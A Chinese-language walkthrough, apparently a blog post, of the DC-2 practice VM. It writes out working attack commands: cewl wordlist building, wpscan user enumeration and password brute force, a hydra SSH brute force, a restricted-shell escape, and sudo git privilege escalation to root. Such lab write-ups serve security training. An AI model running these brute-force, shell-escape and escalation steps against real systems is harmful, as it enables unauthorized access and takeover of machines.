DC-2 入门练习

*DC-2

1. 准备工作:

创建好DC-2靶机
查看网络配置以及MAC地址(为后面扫描找ip准备)![在这里插入图片描述](https://img-blog.csdnimg.cn/20200714153731621.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01yX2hlbGxvd29yZA==,size_16,color_FFFFFF,t_70)

2. 扫描内网找到靶机ip

DC-2 入门练习_第1张图片

3. 找到ip,信息收集(80端口,和ssh端口开放)

DC-2 入门练习_第2张图片
登录访问80端口发现flag1
DC-2 入门练习_第3张图片

4. 根据提示利用cewl制作一个密码字典

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。(简单来讲就是爬行网站,搜集相关信息制作字典)

cewl  cd-2 >pwd.dic
  1. 利用美少妇(msfconsole)进行网站目录扫描(其他工具也可以)
use auxiliary/scanner/http/dir_scanner

set RHOSTS 192.168.1.10

set THREADS 50

exploit

DC-2 入门练习_第4张图片
5.wpscan爆破网站

wpscan --url dc-2 -U user.dic -P pwd1.dic
wpscan --url dc-2 -e u

扫描网站存在用户然后制作user.dic用户名字典
DC-2 入门练习_第5张图片
利用字典爆破出登录用户名密码
DC-2 入门练习_第6张图片

6. 登录后台找到flag2

DC-2 入门练习_第7张图片
DC-2 入门练习_第8张图片

7.hydra爆破ssh登录

根据flag2的提示,我们要找到其他方法拿到flag,这里想到ssh端口于是利用ssh远程爆破
hydra -L user.dic -P pwd.dic ssh://192.168.1.10 -s 7744 -o hydra.ssh -vV     //hydra暴力破解
ssh [email protected] -p 7744                                      //远程登录

sydra爆破成功后用tom用户远程登录,查看目录发现flag3,但是无法查看:
DC-2 入门练习_第9张图片
DC-2 入门练习_第10张图片

8. 绕过限制

(执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径需要自行添加 )

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

如下:

DC-2 入门练习_第11张图片
根据flag3的提示,我们切换到jery用户,然后查看家目录,发现flag4但是无权访问这也意味着下一步需要提权

9. 提权

根据提示我们需要用到git命令,这里和dc-1提权类似,利用具有root权限的命令
1.查看具有root权限

sudo -l

在这里插入图片描述
2. git提权,强制进入交互式状态,让页面缓冲区无法显示全部信息

sudo git -p --help
!/bin/bash

DC-2 入门练习_第12张图片
成功找到flag
DC-2 入门练习_第13张图片

DC靶机系列入门详解,关注查看下一篇

参考资料:千锋网络安全教程
如有不足请指出

你可能感兴趣的:(DC,DC-2)